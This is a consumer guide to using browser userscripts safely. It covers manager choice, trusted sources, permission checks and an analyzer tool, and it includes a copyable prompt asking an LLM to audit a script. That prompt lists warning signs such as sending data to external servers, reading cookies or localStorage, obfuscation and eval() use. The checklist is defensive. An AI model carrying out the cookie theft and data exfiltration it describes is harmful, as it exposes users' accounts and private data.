Userscript Safety Guide
Userscripts can enhance your browsing experience by automating tasks, adding features or stripping away features you don't need/want. But with great power comes great responsibility, they can also pose quite a risk. Here's how to stay safe while using them.
Best Steps Anyone Can Do
First of all:
Use a respectable Userscript Manager:
- Firefox + Violentmonkey is pretty much the only good* combination.
- *Only good as in the only widely used, up-to-date and Free and Open-Source option.
- Tampermonkey is proprietary, Greasemonkey is quite ancient, and the rest are not widely used.
- Though on Chromium browsers the best option is still Tampermonkey.
- Violentmonkey for Chromium was killed by Manifest V3, just like uBlock Origin.
- Greasemonkey has no Chromium version.
Follow these simple steps to check if a userscript is safe:
- Use trusted sites: Install scripts primarily from trusted sites like GreasyFork or OpenUserJS, where reviews and ratings exist.
- Check permissions: Look at the @match and @include lines in the script to ensure it only runs on the sites it needs to.
-
Use the Script Analyzer: Paste the script into the Tampermonkey Script Security Analyzer (by Ilyax) to spot risky behavior.
-
Note: The script analyzer is not an intelligent tool. It is a pattern finding tool that finds suspicious patterns in scripts.
It is not a replacement for a full audit of source code.
-
Note: The script analyzer is not an intelligent tool. It is a pattern finding tool that finds suspicious patterns in scripts.
- Ask an AI: Unless you can read code, your best bet is actually to ask an AI tool, like ChatGPT or Claude, to audit a script.
Here's a comprehensive prompt you can use in any LLM to audit a script:
Please audit the following userscript for any security risks or suspicious behavior. Check for, including but not limited to, the following:
- Does the script do anything that is not explicitly stated or advertised?
- Does the script send data to external servers or make network requests?
- Does it access sensitive information like cookies or localStorage?
- Is there any obfuscated code (e.g., code that is hard to read or hides its functionality)?
- Does it have any unnecessary or overly broad permissions (e.g. running on all websites)?
- Are there any signs of malicious behavior, such as using eval(), setTimeout() with encoded strings, or excessive permissions?
Please provide a summary of the potential risks and whether the script appears safe or not.
Here is the script:
-----------------------
[Replace this with the userscript code]
For Advanced Users
If you're more experienced, you can take these extra steps:
- Manually inspect the code: Look for obfuscated code or network requests that send data to external servers.
- Test in a sandbox: Run the script in a virtual machine or isolated environment to monitor its behavior.
- Monitor script behavior: Watch for any unusual activity in your browser, such as slowdowns or pop-ups.
Clippy wants you to stay safe.